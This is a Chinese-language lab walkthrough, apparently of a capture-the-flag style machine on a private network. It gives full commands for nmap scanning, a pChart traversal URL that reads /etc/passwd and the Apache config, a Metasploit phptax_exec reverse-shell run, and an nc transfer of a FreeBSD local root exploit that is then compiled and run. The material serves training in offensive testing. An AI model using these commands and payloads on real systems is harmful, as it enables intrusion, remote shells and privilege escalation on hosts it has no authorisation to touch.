目标

本地IP：192.168.118.128

目标IP：192.168.118.0/24

信息收集

nmap探测存活主机，扫全端口，扫服务

首先探测到目标ip为：192.168.118.136

nmap -sP 192.168.118.0/24nmap -p- 192.168.118.136nmap -sV -A 192.168.118.136

web渗透

访问web服务192.168.118.136 和192.168.118.136:8080 ，发现web页面都无用

打开源代码查看，发现有一个可拼接的url

拼接url，访问 192.168.118.136/pChart2.1.3/index.php，发现页面也没有可利用的东西

查询pChart漏洞

将此文件拷贝到桌面打开查看

locate php/webapps/31173.txt/usr/share/exploitdb/exploits/php/webapps/31173.txtcp /usr/share/exploitdb/exploits/php/webapps/31173.txt /root/Desktopvim 31173.txt

 里面说明了里面有目录遍历漏洞，并给出了漏洞利用方式

构造下面的路径访问

http://192.168.118.136/pChart2.1.3/examples/index.phpAction=View&Script=%2f..%2f..%2fetc/passwd

发现没有什么用处

访问此路径查询apache配置文件

http://192.168.118.136/pChart2.1.3/examples/index.phpAction=View&Script=%2f..%2f..%2fusr/local/etc/apache22/httpd.conf

 里面这个内容显示出 User-Agent

我们使用BurpSuite，修改浏览器的 User-Agent信息，再次去访问web服务：192.168.118.136:8080，看看会不会有和刚才不一样的结果

将所有的数据包全部如下修改

点击里面唯一的连接，最终得到如下页面

尝试查询 phptax 漏洞

searchsploit phptax

MSF利用漏洞

启动msf，查询漏洞，使用漏洞，设置参数，设置payload ，设置payload参数，运行

msfconsole
use exploit/multi/http/phptax_exec
show options
set rhosts 192.168.118.136
set rport 8080
show payloads
set payload cmd/unix/reverse
set lhost 192.168.118.128
set useragent Mozilla/4.0 Mozilla4_browser
run

最后利用成功，得到shell，输入whoami，为用户www 

提权

查询系统内核版本等信息

uname -a

​

 查询 FreeBSD 漏洞

searchsploit FreeBSD 9.0

将此漏洞利用脚本拷贝到桌面

cp /usr/share/exploitdb/exploits/freebsd/local/28718.c /root/Desktop

使用NC将此漏洞利用脚本上传到目标服务器，然后退出连接，重新run到shell上

nc -lvnp 8888 < 28718.cnc -nv 192.168.118.128 8888 > exp.c

 编译运行，提权成功